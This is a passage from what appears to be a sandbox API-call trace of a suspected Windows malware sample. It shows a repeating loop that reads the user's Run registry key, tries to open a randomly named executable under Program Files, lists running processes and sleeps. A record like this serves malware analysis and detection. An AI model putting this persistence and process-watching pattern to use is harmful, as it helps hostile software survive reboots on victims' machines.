ResultLength=0x19e838) returned 0x0 [0247.264] NtClose (Handle=0x14c) returned 0x0 [0247.264] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.265] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.265] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0247.265] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.265] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.265] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0247.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0247.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0247.355] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0247.355] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0247.358] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0247.358] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0247.358] NtClose (Handle=0x14c) returned 0x0 [0247.358] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.358] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.358] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0247.358] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.358] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.359] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0247.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0247.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0247.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0247.509] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0247.513] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0247.513] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0247.513] NtClose (Handle=0x14c) returned 0x0 [0247.513] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.513] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.514] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0247.514] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.514] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.514] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0247.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0247.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0247.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0247.622] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0247.638] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0247.638] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0247.638] NtClose (Handle=0x14c) returned 0x0 [0247.638] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.638] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.638] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0247.638] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.638] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.638] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0247.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0247.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0247.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0247.757] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0247.793] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0247.793] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0247.793] NtClose (Handle=0x14c) returned 0x0 [0247.793] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.793] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.793] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0247.793] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.793] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.793] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0247.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0247.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0247.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0247.876] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0247.888] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0247.888] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0247.888] NtClose (Handle=0x14c) returned 0x0 [0247.888] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.888] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.888] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0247.888] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.888] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.889] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0247.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0247.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0247.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0247.974] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0247.981] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0247.981] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0247.981] NtClose (Handle=0x14c) returned 0x0 [0247.981] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.982] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.982] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0247.982] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.982] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.982] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0247.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0247.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0248.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0248.065] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0248.075] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0248.075] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0248.075] NtClose (Handle=0x14c) returned 0x0 [0248.076] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.076] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.076] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0248.076] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.076] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.076] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0248.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, 